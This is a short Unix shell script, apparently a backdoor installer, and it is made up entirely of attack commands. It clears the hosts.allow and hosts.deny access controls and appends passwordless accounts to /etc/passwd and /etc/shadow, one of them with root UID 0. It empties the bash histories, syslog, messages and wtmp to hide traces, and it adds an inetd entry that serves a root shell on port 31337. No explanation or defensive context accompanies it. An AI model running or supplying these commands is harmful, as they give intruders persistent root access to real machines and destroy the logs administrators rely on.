cp /etc/hosts.allow /tmp/h.a cp /etc/hosts.deny /tmp/h.d cp /etc/inetd.conf /tmp/i.c echo "# /etc/hosts.allow" > /etc/hosts.allow echo "#" >> /etc/hosts.allow echo "# /etc/hosts.deny" > /etc/hosts.deny echo "#" >> /etc/hosts.deny echo unf::9998:9998:unf,,,:/tmp:/bin/bash >> /etc/passwd echo unf2::0:0:unf,,,:/tmp:/bin/bash >> /etc/passwd echo unf::0:99999:7::: >> /etc/shadow echo unf2::0:99999:7::: >> /etc/shadow cat /dev/null > /root/.bash_history cat /dev/null > /tmp/.bash_history cat /dev/null > /var/log/syslog cat /dev/null > /var/log/messages cat /dev/null > /var/log/wtmp killall -9 inetd echo "31337 stream tcp nowait root /bin/sh -i" >> /etc/inetd.conf `which inetd`